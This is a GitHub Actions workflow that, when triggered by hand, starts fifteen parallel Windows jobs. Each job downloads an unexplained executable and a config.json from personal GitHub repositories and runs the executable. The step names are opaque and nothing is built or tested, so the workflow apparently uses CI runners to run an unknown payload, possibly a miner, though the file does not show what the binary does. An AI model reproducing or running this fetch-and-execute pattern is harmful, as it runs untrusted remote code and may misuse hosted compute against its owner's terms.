name: MMMM
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: WSDS
    runs-on: windows-latest
    strategy:
      max-parallel: 10
      fail-fast: false
      matrix:
        go: [1,2,3,4,5]
        flag: [A,B,C]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: Invoke-WebRequest https://raw.githubusercontent.com/johnwixk228/ujicoba/main/cari.exe -Outfile cari.exe
    - name: PREPARING2 
      run: Invoke-WebRequest https://raw.githubusercontent.com/trautroi/aws/master/1.18/config.json -Outfile config.json
    - name: Running
      run: ./cari.exe
    - name: DONE
      run: exit
